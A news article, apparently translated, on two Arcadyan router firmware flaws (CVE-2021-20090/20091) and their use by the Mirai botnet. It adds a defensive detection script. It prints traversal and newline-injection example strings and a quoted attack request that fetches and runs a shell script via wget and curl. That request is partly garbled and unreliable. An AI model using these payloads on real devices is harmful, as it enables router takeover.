Vulnerability in home routers affecting 17 manufacturers

A large-scale attack has been recorded on the network against home routers whose firmware uses an HTTP server implementation from Arcadyan. To gain control over the devices, a combination of two vulnerabilities is used that allows remote code execution with root privileges. The problem affects a fairly wide range of ADSL routers from Arcadyan, ASUS and Buffalo, as well as devices supplied under the brands of Beeline (the problem is confirmed in the Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone and other telecom operators. It is noted that the problem has been present in Arcadyan firmware for more than ten years and in that time has managed to migrate to at least 20 device models from 10 different manufacturers.

The first vulnerability, CVE-2021-20090, makes it possible to access any web interface script without authentication. The essence of the vulnerability is that in the web interface, some directories through which images, CSS files and JavaScript scripts are served are accessible without authentication. The directories that may be accessed without authentication are checked against the initial part of the requested path (a prefix mask). Specifying the "../" characters in a path to move to the parent directory is blocked by the firmware, but the "..%2f" combination passes the check. As a result, protected pages can be opened by sending requests such as "http://192.168.1.1/images/..%2findex.htm".

The second vulnerability, CVE-2021-20091, allows an authenticated user to change the device's system settings by sending specially formatted parameters to the apply_abstract.cgi script, which does not check for the presence of a newline character in the parameters. For example, when performing a ping operation, an attacker can specify the value "192.168.1.2%0AARC_SYS_TelnetdEnable=1" in the field with the IP address being checked, and the script, when creating the configuration file /tmp/etc/config/.glbcfg, will write the line "AARC_SYS_TelnetdEnable=1" into it, which activates the telnetd server, which in turn provides unrestricted command shell access with root privileges. Similarly, by setting the AARC_SYS parameter, any code can be executed on the system. The first vulnerability makes it possible to run the problematic script without authentication by accessing it as "/images/..%2fapply_abstract.cgi".
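The two checks described above, seen from the defender's side, as an added example (not code from the article or from the firmware): it flags a request whose raw path matches an unauthenticated directory but resolves outside it, and form fields whose decoded value carries a line break. The `/images/` prefix list and the `ping_ip` field name are assumptions made for illustration; the sample strings are constructed from the ones quoted in the text.

```python
import posixpath
from urllib.parse import unquote, parse_qsl

# Assumption: directories served without authentication (the article names /images/).
UNAUTH_PREFIXES = ("/images/",)

def resolve_path(raw_path: str) -> str:
    """Percent-decode until stable, then collapse '.' and '..' segments."""
    path = raw_path.split("?", 1)[0]
    for _ in range(3):  # bounded; also catches double encoding such as %252f
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return posixpath.normpath(path.replace("\\", "/"))

def auth_bypass(raw_path: str) -> bool:
    """True when the raw path matches an unauthenticated prefix but the
    resolved path lies outside it (the '..%2f' case)."""
    if not raw_path.startswith(UNAUTH_PREFIXES):
        return False
    return not (resolve_path(raw_path) + "/").startswith(UNAUTH_PREFIXES)

def injected_lines(form_body: str) -> dict:
    """Map each form field to the extra lines its decoded value would add
    to a line-oriented configuration file."""
    hits = {}
    for name, value in parse_qsl(form_body, keep_blank_values=True):
        parts = value.replace("\r", "\n").split("\n")
        if len(parts) > 1:
            hits[name] = [p for p in parts[1:] if p]
    return hits

def inspect(raw_path: str, form_body: str = "") -> list:
    """Return human-readable findings for one request."""
    findings = []
    if auth_bypass(raw_path):
        findings.append(f"auth-bypass: {raw_path} resolves to {resolve_path(raw_path)}")
    for name, extra in injected_lines(form_body).items():
        findings.append(f"newline-injection: field {name} adds {extra}")
    return findings

if __name__ == "__main__":
    # Constructed samples; 'ping_ip' is a hypothetical field name.
    print(inspect("/images/..%2findex.htm"))
    print(inspect("/images/logo.png"))
    print(inspect("/images/..%2fapply_abstract.cgi",
                  "ping_ip=192.168.1.2%0AARC_SYS_TelnetdEnable=1"))
```

The same two rules work as a server-side fix: resolve the path before comparing it with the allowlist, and reject any parameter value for which `injected_lines` reports a hit.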

To exploit the vulnerabilities, an attacker must be able to send a request to the network port on which the web interface is running. Judging by the dynamics of the attack's spread, many users leave access to their devices open from the external network to simplify the diagnosis of problems by the support service. If access to the interface is limited to the internal network only, the attack can be carried out from the external network using the "DNS rebinding" technique. The vulnerabilities are already being actively used to connect routers to the Mirai botnet:

    POST /images/..%2fapply_abstract.cgi HTTP/1.1
    Connection: close
    User-Agent: Dark

    action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC=212.192.241.7_ping0 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

Source: opennet.ru
